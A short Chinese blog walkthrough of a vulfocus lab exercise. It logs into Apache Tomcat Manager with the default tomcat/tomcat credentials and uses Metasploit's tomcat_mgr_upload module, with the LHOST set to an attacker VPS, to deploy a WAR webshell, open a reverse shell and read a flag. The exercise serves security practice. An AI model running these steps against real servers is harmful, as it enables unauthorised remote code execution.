Tomcat弱口令

背景：
Zab Tomcat是Apache 软件基金会（Apache Software Foundation）的Jakarta 项目中的一个核心项目，由Apache、Sun 和其他一些公司及个人共同开发而成。通过弱口令登录后台，部署war包geshell。

漏洞编号：

影响版本：
弱口令

复现步骤：
1，打开漏洞环境vulfocus

2，访问URL点击Manager App

3，验证弱口令,输入默认账号密码tomcat tomcat

4，使用msf进入exploit/multi/http/tomcat_mgr_upload模块

5，依次设置

set rhost vulfocus.fofa.so
set rport 60231
set httpusername tomcat
set httppassword tomcat
set lhost VPS IP
set lport 6666

6，run

7，查看flag

posted @ 2022-01-10 15:11 Colin.B 阅读(1062) 评论(0) 编辑收藏举报

刷新页面返回顶部

Colin.B